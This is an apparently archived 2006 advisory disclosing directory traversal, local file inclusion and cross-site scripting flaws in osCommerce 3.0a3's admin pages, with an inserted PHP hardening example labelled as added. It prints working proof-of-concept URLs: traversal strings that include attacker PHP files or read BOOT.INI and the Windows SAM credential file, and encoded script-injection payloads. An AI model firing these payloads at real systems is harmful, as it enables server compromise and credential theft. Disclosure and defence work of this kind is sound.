
osc303.txt

Posted Dec 7, 2006
Authored by Lostmon | Site lostmon.blogspot.com

osCommerce version 3.0a3 is susceptible to classic directory traversal and cross site scripting attacks.

tags | exploit, xss
SHA-256 | 484093f7afe8c6176059be9cf82155df749e2cc729ce8921593d03e75431650d

############################################
Oscommerce traversal arbitrary file access
Vendor:http://www.oscommerce.com/about/news,125
Advisory:http://lostmon.blogspot.com/2006/12/oscommerce-traversal-arbitrary-file.html
Vendor notify:NO Exploit available: YES
###########################################

osCommerce contains a flaw that allows remote directory traversal
and arbitrary file access. The flaw exists because the application
does not validate the filter variable upon submission to the
admin/templates_boxes_layout.php script. This could allow a
remote authenticated administrator to create a specially
crafted URL containing '../' directory traversal
characters to view files on the target system with
the privileges of the target web service.



####################
versions
####################

Oscommerce 3.0a3


###################
SOLUTION
###################

No solution was available at this time.


################
timeline
################

Discovered:11-11-2006
vendor notify:-----
vendor response:----
disclosure:07-12-2006

#################
Examples
#################

######################
traversal file access
######################

When we try to open

http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=[SOME WORD]&lID=27

the application discloses the full path and
returns this error:

Warning: require(includes/templates/[SOME WORD].php) [function.require]:
failed to open stream: No such file or directory in C:\AppServ\www\
oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13

Fatal error: require() [function.require]: Failed opening required
'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear')
in C:\AppServ\www\oscommerce\admin\templates\pages\templates_
boxes_layout.php on line 13

The application appends the .php extension to our [SOME WORD]
and searches for the file in a folder inside the web server.
We can therefore include any PHP file located on the web server
in the application, and it is executed (local file inclusion):

http://[victim]/admin/templates_boxes_layout.php?
set=boxes&filter=../../our_evil_php_file&lID=27

To read a file outside the web server folder that has a non-PHP
extension, we can test with this:

&filter=../../../../file.extension%00

for example, to look for boot.ini on a Windows system:

http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=../../../../BOOT.INI%00&lID=27

http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=content&filter=../../../../windows/repair/sam%00&lID=27
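A hardened way to resolve the filter value before it reaches require(), as an added example that is not osCommerce code and not part of the original advisory. resolve_template() and the allowed-name pattern are hypothetical; the includes/templates/<filter>.php layout is assumed from the error message above.

```php
<?php
// Added example, not osCommerce code. Assumption: the admin page builds
// "includes/templates/<filter>.php" from the request, as the warning in the
// advisory suggests. resolve_template() is a hypothetical helper.

function resolve_template(string $baseDir, string $filter): ?string
{
    // Accept only a plain template name: no slashes, dots, backslashes or
    // NUL bytes, so "../" sequences and "%00" never reach the filesystem.
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $filter)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }

    // Canonicalise, then confirm the file still lives inside the template
    // folder (defence in depth against symlinks); missing files fail here too.
    $path = realpath($base . DIRECTORY_SEPARATOR . $filter . '.php');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary template folder holding one legitimate file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . getmypid();
is_dir($dir) || mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'boxes.php', "<?php // template\n");

// Constructed inputs modelled on the filter values shown in the advisory.
$inputs = ['boxes', '../../our_evil_php_file', "../../../../BOOT.INI\0", 'missing'];
foreach ($inputs as $in) {
    $resolved = resolve_template($dir, $in);
    printf("%-32s => %s\n",
        json_encode($in, JSON_UNESCAPED_SLASHES),
        $resolved === null ? 'rejected' : 'accepted');
}

unlink($dir . DIRECTORY_SEPARATOR . 'boxes.php');
rmdir($dir);
```

Answering a null result with a generic error page, and running production with display_errors disabled, also avoids the full path disclosure shown in the warning.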

#####################
Cross site scripting
#####################

http://localhost/oscommerce/admin/modules.php?set=shipping
%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

http://localhost/definitiva/admin/customers.php?selected_box=customers
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E

http://localhost/oscommerce/admin/languages_definitions.php?lID=1
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E

http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT
%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product


######################## €nd #####################

Thanks to Estrella for being my light.

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....